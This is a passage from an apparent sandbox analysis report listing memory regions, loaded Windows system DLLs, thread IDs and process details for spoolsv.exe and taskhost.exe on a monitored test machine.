"\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 7228 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 7229 start_va = 0x7fefd6f0000 end_va = 0x7fefd72cfff monitored = 0 entry_point = 0x7fefd6f18f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 7230 start_va = 0x7fefd730000 end_va = 0x7fefd743fff monitored = 0 entry_point = 0x7fefd7310e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 7231 start_va = 0x7fefd750000 end_va = 0x7fefd75efff monitored = 0 entry_point = 0x7fefd7519b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 7232 start_va = 0x7fefd7f0000 end_va = 0x7fefd7fefff monitored = 0 entry_point = 0x7fefd7f1020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 7233 start_va = 0x7fefd800000 end_va = 0x7fefd96cfff monitored = 0 entry_point = 0x7fefd8010b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 7234 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7235 start_va = 0x7fefda20000 end_va = 0x7fefda55fff monitored = 0 entry_point = 0x7fefda21474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 7236 start_va = 0x7fefdca0000 end_va = 0x7fefdd38fff monitored = 0 entry_point = 0x7fefdca1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 7237 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7238 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7239 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7240 start_va = 0x7fefef30000 end_va = 0x7fefefa0fff monitored = 0 entry_point = 0x7fefef41e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 7241 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7242 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7243 start_va = 0x7feff130000 end_va = 0x7feff137fff monitored = 0 entry_point = 0x7feff131504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 7244 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7245 start_va = 0x7feff180000 end_va = 0x7feff1d1fff monitored = 0 entry_point = 0x7feff1810d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 7246 start_va = 0x7feff1e0000 end_va = 0x7feff2b6fff monitored = 0 entry_point = 0x7feff1e3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 7247 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7248 start_va = 0x7feff2f0000 end_va = 0x7feff4f2fff monitored = 0 entry_point = 0x7feff313330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 7249 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 7250 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 7251 start_va = 0x7feffac0000 end_va = 0x7feffb0cfff monitored = 0 entry_point = 0x7feffac1070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 7252 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7253 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 7254 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 7255 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 7256 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 7257 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 7258 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 7259 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 7260 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 7261 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 7262 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 7263 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 7264 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7265 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 7266 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 7267 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 7268 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 7269 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Thread: id = 390 os_tid = 0x85c Thread: id = 391 os_tid = 0x178 Thread: id = 392 os_tid = 0x484 Thread: id = 393 os_tid = 0x2a4 Thread: id = 394 os_tid = 0x150 Thread: id = 395 os_tid = 0x744 Thread: id = 396 os_tid = 0x6bc Thread: id = 397 os_tid = 0x328 Thread: id = 398 os_tid = 0x758 Thread: id = 399 os_tid = 0x6a0 Thread: id = 400 os_tid = 0x690 Thread: id = 401 os_tid = 0x600 Thread: id = 402 os_tid = 0x468 Thread: id = 403 os_tid = 0x45c Thread: id = 404 os_tid = 0x458 Process: id = "44" image_name = "spoolsv.exe" filename = "c:\\windows\\system32\\spoolsv.exe" page_root = "0x7708a000" os_pid = "0x4e8" os_integrity_level = "0x4000" os_privileges = "0x20a00080" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x1c8" cmd_line = "C:\\Windows\\System32\\spoolsv.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Spooler" [0xe], "NT AUTHORITY\\Logon Session 00000000:000139ce" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 405 os_tid = 0x598 Thread: id = 406 os_tid = 0x56c Thread: id = 407 os_tid = 0x450 Thread: id = 408 os_tid = 0x7cc Thread: id = 409 os_tid = 0x39c Thread: id = 410 os_tid = 0x3a0 Thread: id = 411 os_tid = 0x3b4 Thread: id = 412 os_tid = 0x494 Thread: id = 413 os_tid = 0x528 Thread: id = 414 os_tid = 0x510 Thread: id = 415 os_tid = 0x504 Thread: id = 416 os_tid = 0x4ec Process: id = "45" image_name = "taskhost.exe" filename = "c:\\windows\\system32\\taskhost.exe" page_root = "0x77e22000" os_pid = "0x508" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x1c8" cmd_line = "\"taskhost.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7523 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7524 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskhost.exe.mui" filename = "\\Windows\\System32\\en-US\\taskhost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskhost.exe.mui") Region: id = 7525 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7526 start_va = 0x40000 end_va = 0xa6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7527 start_va = 0xb0000 end_va = 0xb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 7528 start_va = 0xc0000 end_va = 0xc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 7529 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 7530 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 7531 start_va = 0xf0000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 7532 start_va = 0x170000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7533 start_va = 0x270000 end_va = 0x270fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msctfmonitor.dll.mui" filename = "\\Windows\\System32\\en-US\\MsCtfMonitor.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\msctfmonitor.dll.mui") Region: id = 7534 start_va = 0x280000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 7535 start_va = 0x380000 end_va = 0x507fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 7536 start_va = 0x510000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 7537 start_va = 0x520000 end_va = 0x6a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 7538 start_va = 0x6b0000 end_va = 0x1aaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 7539 start_va = 0x1ab0000 end_va = 0x1ab1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ab0000" filename = "" Region: id = 7540 start_va = 0x1ac0000 end_va = 0x1ac5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winmm.dll.mui" filename = "\\Windows\\System32\\en-US\\winmm.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winmm.dll.mui") Region: id = 7541 start_va = 0x1ad0000 end_va = 0x1ad0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ad0000" filename = "" Region: id = 7542 start_va = 0x1ae0000 end_va = 0x1aecfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 7543 start_va = 0x1af0000 end_va = 0x1af0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wdmaud.drv.mui" filename = "\\Windows\\System32\\en-US\\wdmaud.drv.mui" (normalized: "c:\\windows\\system32\\en-us\\wdmaud.drv.mui") Region: id = 7544 start_va = 0x1b00000 end_va = 0x1b00fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mmdevapi.dll.mui" filename = "\\Windows\\System32\\en-US\\MMDevAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mmdevapi.dll.mui") Region: id = 7545 start_va = 0x1b10000 end_va = 0x1b11fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b10000" filename = "" Region: id = 7546 start_va = 0x1b30000 end_va = 0x1baffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b30000" filename = "" Region: id = 7547 start_va = 0x1bb0000 end_va = 0x1c8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bb0000" filename = "" Region: id = 7548 start_va = 0x1c90000 end_va = 0x1d4ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 7549 start_va = 0x1d60000 end_va = 0x1ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d60000" filename = "" Region: id = 7550 start_va = 0x1de0000 end_va = 0x1de0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001de0000" filename = "" Region: id = 7551 start_va = 0x1df0000 end_va = 0x1df0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001df0000" filename = "" Region: id = 7552 start_va = 0x1e00000 end_va = 0x1e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 7553 start_va = 0x1ea0000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 7554 start_va = 0x1f50000 end_va = 0x1fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f50000" filename = "" Region: id = 7555 start_va = 0x2040000 end_va = 0x20bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 7556 start_va = 0x20c0000 end_va = 0x213ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020c0000" filename = "" Region: id = 7557 start_va = 0x2160000 end_va = 0x21dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 7558 start_va = 0x2290000 end_va = 0x230ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002290000" filename = "" Region: id = 7559 start_va = 0x2400000 end_va = 0x247ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 7560 start_va = 0x24b0000 end_va = 0x252ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024b0000" filename = "" Region: id = 7561 start_va = 0x2610000 end_va = 0x261ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 7562 start_va = 0x2620000 end_va = 0x28eefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 7563 start_va = 0x28f0000 end_va = 0x29effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028f0000" filename = "" Region: id = 7564 start_va = 0x29f0000 end_va = 0x2aeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 7565 start_va = 0x2af0000 end_va = 0x2ef2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002af0000" filename = "" Region: id = 7566 start_va = 0x3500000 end_va = 0x357ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003500000" filename = "" Region: id = 7567 start_va = 0x741a0000 end_va = 0x741a5fff monitored = 0 entry_point = 0x741a1010 region_type = mapped_file name = "ksuser.dll" filename = "\\Windows\\System32\\ksuser.dll" (normalized: "c:\\windows\\system32\\ksuser.dll") Region: id = 7568 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7569 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7570 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7571 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 7572 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 7573 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7574 start_va = 0xffb80000 end_va = 0xffb93fff monitored = 0 entry_point = 0xffb82ce0 region_type = mapped_file name = "taskhost.exe" filename = "\\Windows\\System32\\taskhost.exe" (normalized: "c:\\windows\\system32\\taskhost.exe") Region: id = 7575 start_va = 0x7fef4ae0000 end_va = 0x7fef4aedfff monitored = 0 entry_point = 0x7fef4ae5d28 region_type = mapped_file name = "dimsjob.dll" filename = "\\Windows\\System32\\dimsjob.dll" (normalized: "c:\\windows\\system32\\dimsjob.dll") Region: id = 7576 start_va = 0x7fef4bf0000 end_va = 0x7fef4bfbfff monitored = 0 entry_point = 0x7fef4bf602c region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 7577 start_va = 0x7fef6a50000 end_va = 0x7fef6ac3fff monitored = 0 entry_point = 0x7fef6a566f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 7578 start_va = 0x7fef8160000 end_va = 0x7fef8177fff monitored = 0 entry_point = 0x7fef8161630 region_type = mapped_file name = "playsndsrv.dll" filename = "\\Windows\\System32\\PlaySndSrv.dll" (normalized: "c:\\windows\\system32\\playsndsrv.dll") Region: id = 7579 start_va = 0x7fef8180000 end_va = 0x7fef81bcfff monitored = 0 entry_point = 0x7fef8181bdc region_type = mapped_file name = "msutb.dll" filename = "\\Windows\\System32\\msutb.dll" (normalized: "c:\\windows\\system32\\msutb.dll") Region: id = 7580 start_va = 0x7fef81c0000 end_va = 0x7fef81cafff monitored = 0 entry_point = 0x7fef81c1290 region_type = mapped_file name = "msctfmonitor.dll" filename = "\\Windows\\System32\\MsCtfMonitor.dll" (normalized: "c:\\windows\\system32\\msctfmonitor.dll") Region: id = 7581 start_va = 0x7fef8580000 end_va = 0x7fef8588fff monitored = 0 entry_point = 0x7fef8582f98 region_type = mapped_file name = "midimap.dll" filename = "\\Windows\\System32\\midimap.dll" (normalized: "c:\\windows\\system32\\midimap.dll") Region: id = 7582 start_va = 0x7fef8590000 end_va = 0x7fef85a7fff monitored = 0 entry_point = 0x7fef8591060 region_type = mapped_file name = "msacm32.dll" filename = "\\Windows\\System32\\msacm32.dll" (normalized: "c:\\windows\\system32\\msacm32.dll") Region: id = 7583 start_va = 0x7fef85b0000 end_va = 0x7fef85b9fff monitored = 0 entry_point = 0x7fef85b49f0 region_type = mapped_file name = "msacm32.drv" filename = "\\Windows\\System32\\msacm32.drv" (normalized: "c:\\windows\\system32\\msacm32.drv") Region: id = 7584 start_va = 0x7fef85c0000 end_va = 0x7fef85cafff monitored = 0 entry_point = 0x7fef85c48d8 region_type = mapped_file name = "hotstartuseragent.dll" filename = "\\Windows\\System32\\HotStartUserAgent.dll" (normalized: "c:\\windows\\system32\\hotstartuseragent.dll") Region: id = 7585 start_va = 0x7fef85d0000 end_va = 0x7fef861efff monitored = 0 entry_point = 0x7fef85d2760 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 7586 start_va = 0x7fef8620000 end_va = 0x7fef865afff monitored = 0 entry_point = 0x7fef8647600 region_type = mapped_file name = "wdmaud.drv" filename = "\\Windows\\System32\\wdmaud.drv" (normalized: "c:\\windows\\system32\\wdmaud.drv") Region: id = 7587 start_va = 0x7fef8660000 end_va = 0x7fef869afff monitored = 0 entry_point = 0x7fef86622f0 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 7588 start_va = 0x7fefb2f0000 end_va = 0x7fefb2fafff monitored = 0 entry_point = 0x7fefb2f4f8c region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 7589 start_va = 0x7fefb300000 end_va = 0x7fefb30bfff monitored = 0 entry_point = 0x7fefb3015d8 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 7590 start_va = 0x7fefb3c0000 end_va = 0x7fefb3d4fff monitored = 0 entry_point = 0x7fefb3c60d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 7591 start_va = 0x7fefb4b0000 end_va = 0x7fefb5d6fff monitored = 0 entry_point = 0x7fefb4b10ec region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 7592 start_va = 0x7fefb6e0000 end_va = 0x7fefb6e8fff monitored = 0 entry_point = 0x7fefb6e1010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 7593 start_va = 0x7fefbaa0000 end_va = 0x7fefbab0fff monitored = 0 entry_point = 0x7fefbaa1070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 7594 start_va = 0x7fefbc40000 end_va = 0x7fefbc57fff monitored = 0 entry_point = 0x7fefbc41130 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 7595 start_va = 0x7fefbc60000 end_va = 0x7fefbcaafff monitored = 0 entry_point = 0x7fefbc6efcc region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 7596 start_va = 0x7fefc070000 end_va = 0x7fefc0c5fff monitored = 0 entry_point = 0x7fefc07bbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 7597 start_va = 0x7fefc0d0000 end_va = 0x7fefc1fbfff monitored = 0 entry_point = 0x7fefc0d94bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 7598 start_va = 0x7fefcd40000 end_va = 0x7fefcd86fff monitored = 0 entry_point = 0x7fefcd41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 7599 start_va = 0x7fefd040000 end_va = 0x7fefd057fff monitored = 0 entry_point = 0x7fefd043b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 7600 start_va = 0x7fefd610000 end_va = 0x7fefd634fff monitored = 0 entry_point = 0x7fefd619658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 7601 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 7602 start_va = 0x7fefd6f0000 end_va = 0x7fefd72cfff monitored = 0 entry_point = 0x7fefd6f18f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 7603 start_va = 0x7fefd730000 end_va = 0x7fefd743fff monitored = 0 entry_point = 0x7fefd7310e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 7604 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7605 start_va = 0x7fefda20000 end_va = 0x7fefda55fff monitored = 0 entry_point = 0x7fefda21474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 